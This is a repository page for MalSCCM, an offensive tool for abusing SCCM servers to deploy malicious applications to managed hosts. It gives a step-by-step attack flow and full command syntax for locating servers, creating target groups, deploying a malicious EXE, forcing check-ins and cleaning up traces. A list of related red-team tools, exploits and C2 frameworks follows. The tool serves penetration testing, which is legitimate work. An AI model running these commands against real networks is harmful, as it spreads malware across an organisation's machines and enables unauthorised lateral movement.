  • Stars: 241
  • Rank: 167,578 (Top 4 %)
  • Language: C#
  • Created over 2 years ago
  • Updated about 1 year ago

Repository Details

MalSCCM

This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to the hosts they manage. To use this tool, your current process must have admin rights over the SCCM server.

Typically, SCCM deployments will either have the management server and the primary server on the same host, in which case the host returned by the locate command can be used as the primary server, or have them on separate hosts.

If they are on separate hosts, you will need to compromise the management host returned by locate, then run locate again on that host to get the primary server hostname. Once you have that and admin access, you are good to go!

Blog

For more information on usage of the tool, refer to the blog below.

Credits

Massive credit to PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM), on which this is all based. This would not have been done without the work of @harmj0y, @jaredcatkinson, @enigma0x3 and @mattifestation.

Attack Flow

  • Compromise a client, use locate to find the management server
  • Compromise the management server, use locate to find the primary server
  • Use inspect on the primary server to view who you can target
  • Create a new device group for the machines you want to laterally move to
  • Add your targets into the new group
  • Create an application pointing to a malicious EXE on a world-readable share
  • Deploy the application to the target group
  • Force the target group to check in for updates
  • Profit...
  • Clean up the application and deployment
  • Delete the group

Help menu

Commands listed below have optional parameters in <>.

Attempt to find the SCCM management and primary servers:
    MalSCCM.exe locate

Inspect the primary server to gather SCCM information:
    MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>

Create/Modify/Delete groups to add targets to for deploying malicious apps. Groups can be for either devices or users:
    MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
    MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
    MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
    MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>

Create/Deploy/Delete malicious applications:
    MalSCCM.exe app /create /name:appname /uncpath:"\\unc\path" </server:PrimarySiteHostname>
    MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
    MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>

Force devices of a group to check in within a couple of minutes:
    MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>

More Repositories

  • PoshC2 (PowerShell, 1,767 stars): A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
  • xss_payloads (PHP, 697 stars): Exploitation for XSS
  • PoshC2_Old (PowerShell, 574 stars): Powershell C2 Server and Implants
  • SharpSocks (C#, 472 stars): Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
  • SharpWSUS (C#, 429 stars)
  • RunPE (C#, 416 stars): C# Reflective loader for unmanaged binaries.
  • SimplePELoader (C++, 366 stars): In-Memory PE Loader
  • Prowl (Python, 275 stars)
  • ETWHash (C#, 248 stars): C# POC to extract NetNTLMv1/v2 hashes from ETW provider
  • scrounger (Python, 237 stars): Mobile application testing toolkit
  • ShellcodeMutator (Python, 232 stars)
  • Aladdin (C#, 212 stars)
  • Tartarus-TpAllocInject (C++, 172 stars)
  • RunOF (C#, 138 stars)
  • Invoke-PowerThIEf (PowerShell, 130 stars): The PowerThIEf, an Internet Explorer Post Exploitation library
  • DLLInjection (C++, 70 stars): DLL Injection Library & Tools
  • SharpConflux (C#, 63 stars)
  • zeropress (Python, 55 stars): A dumb script for finding dumb coding errors in WordPress plugins
  • CVE-2024-20356 (Python, 47 stars): This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.
  • CVE-2024-25153 (Python, 43 stars): Proof-of-concept exploit for CVE-2024-25153.
  • defensive-scripts (34 stars): Defence Against the Dark Arts
  • InlineFunctionHooking (C, 28 stars): Windows Inline function hooking library targeted at MSVC
  • pwnlyoffice (JavaScript, 24 stars): Exploit ONLYOFFICE Implementations
  • PoshC2_IOCs (YARA, 23 stars): A list of IOCs applicable to PoshC2
  • SyscallsExtractor (C#, 23 stars)
  • logparser (21 stars): SQL scripts for querying event logs
  • yasha (Python, 18 stars)
  • metasploit-modules (Ruby, 12 stars): Modules created by Nettitude for Metasploit
  • hyperv-driver-thread-detection-poc (C#, 11 stars)
  • PoshC2_Shellcode (C, 11 stars): Supporting projects for PoshC2
  • CVE-2022-23253-PoC (Python, 5 stars): CVE-2022-23253 PoC
  • PoshC2_Linux_Implant (C, 4 stars)
  • PBind (C#, 2 stars): PBind payloads for PoshC2
  • secure-development-training (PHP, 2 stars)
  • PoshC2_Core (C#, 1 star)
  • FComm (C#, 1 star): FComm payloads for PoshC2